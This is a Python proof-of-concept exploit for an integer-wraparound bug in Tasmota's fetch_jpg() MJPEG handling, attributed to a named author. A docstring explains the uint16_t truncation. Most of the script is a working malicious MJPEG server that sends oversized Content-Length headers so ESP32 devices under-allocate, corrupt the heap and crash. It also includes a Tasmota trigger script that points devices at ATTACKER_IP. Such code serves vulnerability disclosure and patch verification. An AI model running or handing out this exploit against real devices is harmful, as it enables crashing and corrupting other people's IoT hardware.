#!/usr/bin/env python3 """ PoC: CVE-2026-38427 Target: Tasmota <= 15.3.0.3 File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino Function: fetch_jpg() case 2 Vulnerability: Content-Length from MJPEG frame stored in uint16_t: char inbuff[64]; stream.readBytesUntil('\n', inbuff, sizeof(inbuff)); // "Content-Length: 70000" char *cp = strchr(inbuff, ':'); uint16_t size = 0; if (cp) { size = atoi(cp + 1); // atoi("70000") = 70000 (int) // IMPLICIT TRUNCATION: uint16_t size = 70000 → 4464 (70000 % 65536) } uint8_t *buff = (uint8_t *)special_malloc(size); // malloc(4464) if (buff) { stream.readBytes(buff, size); // reads 4464 bytes } // Stream still has 65536 unread bytes → heap/stream corruption Integer Wraparound: value → uint16_t result 65536 → 0 (if(size>0) skipped entirely) 65537 → 1 (malloc 1 byte) 70000 → 4464 (malloc 4464, but JPEG is 70000 bytes) 131072 → 0 (malloc 0 / skipped) Impact: - Heap corruption via stream state mismatch - malloc(0) or malloc(1) with large data pending → crash - On ESP32: special_malloc(0) may return non-NULL → heap corruption Tasmota script to trigger: >D >B fetchjp(ATTACKER_IP:8889/stream,0,0,1) >1 =fetchjp(2,0,0,1) ; get next frame (triggers case 2) Usage: python3 CVE-2026-38427_poc.py --port 8889 --cl 65537 python3 CVE-2026-38427_poc.py --port 8889 --cl 131072 Author: Saidakbarxon Maxsudxonov CVE: CVE-2026-38427 """ import socket import argparse import time import os from datetime import datetime BANNER = """ ╔══════════════════════════════════════════════════════╗ ║ CVE-2026-38427 PoC — Tasmota fetch_jpg() ║ ║ uint16_t Integer Wraparound → Heap Overflow ║ ║ Affected: Tasmota <= 15.3.0.3 (ESP32) ║ ╚══════════════════════════════════════════════════════╝ """ def log(msg, level="*"): ts = datetime.now().strftime("%H:%M:%S") print(f"[{ts}] [{level}] {msg}") def uint16_wrap(value): """Simulate uint16_t truncation""" return value & 0xFFFF def make_mjpeg_frame(content_length_header, actual_data_size, fill_byte=b'\xff'): """ Build a single MJPEG multipart frame. content_length_header = what we PUT in the header (malicious) actual_data_size = how much data we actually send """ # Fake minimal JPEG (SOI + EOI markers) jpeg_data = (b'\xff\xd8\xff\xe0' + # SOI + APP0 marker b'\x00\x10JFIF\x00' + # JFIF header b'\x01\x01\x00\x00\x01' + b'\x00\x01\x00\x00' + fill_byte * (actual_data_size - 20) + # padding b'\xff\xd9') # EOI marker jpeg_data = jpeg_data[:actual_data_size] frame = ( f"--myboundary\r\n" f"Content-Type: image/jpeg\r\n" f"Content-Length: {content_length_header}\r\n" f"\r\n" ).encode() + jpeg_data + b"\r\n" return frame def handle_client(conn, addr, content_length, frames): log(f"Tasmota connected: {addr[0]}:{addr[1]}", "+") try: # Receive initial HTTP request request = conn.recv(2048).decode('utf-8', errors='ignore') log(f"Request: {request.splitlines()[0] if request else 'empty'}") # Step 1: Send initial HTTP 200 response (fetch_jpg case 0) actual_cl = uint16_wrap(content_length) log(f"Content-Length in header: {content_length}") log(f"uint16_t truncated value: {actual_cl} ({content_length} & 0xFFFF)") log(f"Buffer allocated on ESP32: {actual_cl} bytes") log(f"Actual data in stream: {content_length} bytes") log(f"Unread bytes after readBytes(): {content_length - actual_cl}", "!") # Initial response init_response = ( "HTTP/1.1 200 OK\r\n" "Content-Type: multipart/x-mixed-replace; boundary=myboundary\r\n" "Connection: keep-alive\r\n" "\r\n" ).encode() conn.send(init_response) log("Initial HTTP response sent (case 0 complete)") time.sleep(0.5) # Step 2: Send MJPEG frames with malicious Content-Length (case 2) for i in range(frames): log(f"Sending frame {i+1}/{frames} with Content-Length: {content_length}", "!") # Send frame with MALICIOUS content-length header # but actual_data = content_length bytes to fill the stream frame = make_mjpeg_frame( content_length_header=content_length, actual_data_size=content_length ) conn.send(frame) log(f" Header says: {content_length} bytes") log(f" ESP32 reads: {actual_cl} bytes (uint16_t wrap)") log(f" Remaining in stream: {content_length - actual_cl} bytes (CORRUPTION!)", "!") time.sleep(0.3) log("All frames sent — ESP32 should crash/reboot now", "!") time.sleep(2) except BrokenPipeError: log("ESP32 disconnected (likely crashed!)", "+") except Exception as e: log(f"Error: {e}", "-") finally: conn.close() def main(): print(BANNER) parser = argparse.ArgumentParser(description="CVE-2026-38427 PoC Server") parser.add_argument("--ip", default="0.0.0.0") parser.add_argument("--port", type=int, default=8889) parser.add_argument("--cl", type=int, default=65537, help="Malicious Content-Length (>65535)") parser.add_argument("--frames", type=int, default=3, help="Number of frames to send") args = parser.parse_args() if args.cl <= 65535: log(f"WARNING: Content-Length {args.cl} <= 65535, no wraparound!", "-") log("Use --cl 65537 or higher for wraparound", "-") print(BANNER) log("CVE-2026-38427 — uint16_t Integer Wraparound PoC", "+") log(f"Listening: {args.ip}:{args.port}") log(f"Content-Length: {args.cl} → wraps to {uint16_wrap(args.cl)}") log("─" * 54) log("Wraparound table:") for cl in [65536, 65537, 65600, 70000, 131072, 131073]: wrapped = uint16_wrap(cl) log(f" {cl:>7} → {wrapped:>5} (corrupts {cl-wrapped} bytes in stream)") log("─" * 54) log(f"Tasmota script:") log(f" >D") log(f" >B") log(f" fetchjp(YOUR_IP:{args.port}/stream,0,0,1)") log(f" >1") log(f" =fetchjp(2,0,0,1)") log("─" * 54) server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) server.bind((args.ip, args.port)) server.listen(5) log("Waiting for Tasmota device...", "*") try: while True: conn, addr = server.accept() handle_client(conn, addr, args.cl, args.frames) except KeyboardInterrupt: log("Stopped") finally: server.close() if __name__ == "__main__": main()